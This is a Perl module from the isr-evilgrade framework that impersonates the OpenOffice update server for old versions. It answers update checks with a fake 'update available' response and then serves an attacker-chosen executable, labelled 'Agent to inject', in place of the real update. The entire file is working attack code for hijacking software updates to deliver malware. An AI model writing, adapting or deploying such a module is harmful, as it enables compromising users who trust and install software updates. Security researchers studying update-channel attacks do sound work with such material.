############### # openoffice.pm # # Copyright 2010 Francisco Amato # # This file is part of isr-evilgrade, www.infobytesec.com . # # isr-evilgrade is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation version 2 of the License. # # isr-evilgrade is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with isr-evilgrade; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # # ''' ## package modules::openoffice; use strict; use Data::Dump qw(dump); my $base= { 'name' => 'openoffice', 'version' => '1.0', 'appver' => '< 2.1.0', 'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ], 'description' => qq{}, 'vh' => '(update.services.openoffice.org|update23.services.openoffice.org)', 'request' => [ { 'req' => 'ProductUpdateService/check.Update', #regex friendly 'type' => 'string', #file|string|agent|install 'method' => '', #any 'bin' => '0', 'string' => "yes\$\$\$http://update.services.openoffice.org/openofficeupdate<%RND1%>.exe\$\$\$buildid=<%VERSION%>\nProductPatch=null\nProductSource=<%SOURCE%>\nProductKey=OpenOffice.org <%VERSION%>\nAllLanguages=es\n_OS=Windows\n_ARCH=x86\n", 'parse' => '1', 'file' => '', }, { 'req' => '.exe', #regex friendly 'type' => 'agent', #file|string|agent|install 'method' => '', #any 'bin' => 1, 'string' => '', 'parse' => '0', 'file' => '' }, ], #Options 'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'}, 'enable' => { 'val' => 1, 'desc' => 'Status'}, 'version' => { 'val' => "'9'.isrcore::utils::RndNum(3)", 'hidden' => 1, 'dynamic' =>1,}, 'source' => { 'val' => "'OO'.isrcore::utils::RndAlpha(4)", 'hidden' => 1, 'dynamic' =>1,}, 'rnd1' => { 'val' => 'isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))', 'hidden' => 1, 'dynamic' =>1,}, } }; ########################################################################## # FUNCTION new # RECEIVES # RETURNS # EXPECTS # DOES class's constructor sub new { my $class = shift; my $self = { 'Base' => $base, @_ }; return bless $self, $class; } 1;